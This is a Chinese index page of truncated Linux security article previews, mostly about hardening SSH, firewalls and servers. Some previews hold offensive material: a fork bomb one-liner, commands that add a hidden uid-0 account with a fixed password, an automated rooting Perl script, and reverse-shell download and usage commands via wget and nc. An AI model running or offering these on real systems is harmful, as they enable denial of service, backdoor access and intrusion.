增强 SSH 安全性的 7 条技巧
在绝大部分的 Linux 服务器上都使用 OpenSSH 作为 SSH server,所以这篇文章只针对 OpenSSH。其实这些技巧都是很基础的,但如果你能好好使用它们的话,一定程度上确实可以有效提升 SSH 的安全性. #以下配置项都是在 /etc/ssh/sshd_config 文件中修改。 1. 禁止 root 登录 P...
Linux fork炸弹及其预防
在Linux系统下执行这段代码 :(){ :|: };: A. This is a bash function. It gets called recursively (recursive function). This is most horrible code for any Unix / Linux box. It is often used by sys admin to test user processes limitations (Linux process limit...
Linux 下添加系统管理员的命令
useradd -g 0 -u 0 -o mickey echo mickey:minnie |chpasswd 这两条命令的意思为:添加一个具有 root 权限的用户名为 mickey,密码为 minnie 的系统帐号。...
Linux文件权限的设置技巧
Windows系统其实和Linux系统有相似的地方,Windows系统文件、目录的属性有只读、隐藏,而Linux也一样。 Linux中,每一个文件都具有特定的属性。主要包括文件类型和文件权限两个方面。可以分为5种不同的类型:普通文件、目录文件、链接文件、设备文件和管道文件。 所谓的文件...
Linux非交互环境下本地提权思路与反思
在iptables限制非常严格的时候,无法走icmp udp tcp的bind shell或connect back shell,又需要本地提权,root了之后关闭iptables,看看能否绕过访问控制手段(当然了,如果别人是硬件的防火墙,下文解决不了问题)。在这一场景下,可以考虑参考下文的非交互式本地提权的方法...
linux 全自动提权脚本
-------------------------------Start-------------------------------------- #!/usr/bin/perl # # == Viper Auto Rooting == # # # --------------------------------------------------------------------------------------------------------------------------- # Sc...
denyhost防止SSH暴力破解,保护你的linux
本文介绍了linux下使用denyhost防止ssh暴力破解,保护linux安全。 工作中的linux服务器每天都会有无数的SSH失败尝试记录,有些人一直不停的扫描,使用软件在那里穷举扫描,所以大家第一要记的设置一个好的够复杂的密码。 怎么样防,如果要一条一条将这些IP阻止显然治标不治本...
用iptables架设安全的vsftpd服务器
在实际工作中,可用以下脚本架设一台很安全的内部FTP服务器;当然也可以配合Wireshark理解vsftpd的被动与主动的区别,以本机192.168.0.10为例,脚本如下#!/bin/bash iptables -F iptables -X iptables -Z iptables -t nat -F iptables -t nat -X iptables -t nat -Z #开启ip...
linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行
在线下载 可以用 wget http://www.linuxso.com/linuxexp/shell.cwget http://www.linuxso.com/linuxexp/shell.pl C语言版 用法说明:在外网linux上监听 nc -l -p 端口gcc -o shell shell.c./shell ip 端口 perl版 用法;在外网linux上监听 nc -l -p 端口perl shell.pl ip 端口...
Ubuntu下root帐户的权限使用
Ubuntu下搞定root帐户方法: 1、使屏蔽root帐户现身: 以下是打开X下的终端进行修改的全过程:(//为后面注释内容) zk@zkubuntu:~$ su //没搞定之前想进root帐户Password: //输入密码su: Authentication failure //提示失败抱歉zk@zkubuntu:~$ passwd root//想在一般帐户下更...
Linux Shell Script---扫描C段主机是否存活
学Linux没多长时间,自己写了个ShellScript,功能实现的比较简单,主要是利用ping来判断某段主机是否存活 有缺陷的地方,没对用户输入的IP地址进行判断是否合法 比较菜的一个shellscript,可以给刚学Linux的同学一个参考,大牛绕路!!! 贴上来之后LOGO就花掉了,老郁闷鸟...
保护你的Ubuntu服务器
安全是相对的,使用本文介绍的这些方法不能绝对保证你的服务器是安全的,但可以肯定的是它比以前更安全,也比大多数服务器要安全,至少菜鸟级的黑客是无法攻破的;安全是一个持续的过程,它不是一蹴而就的,我们认为,在安全领域是需要一点偏执精神的。 本文所列举的这些保护...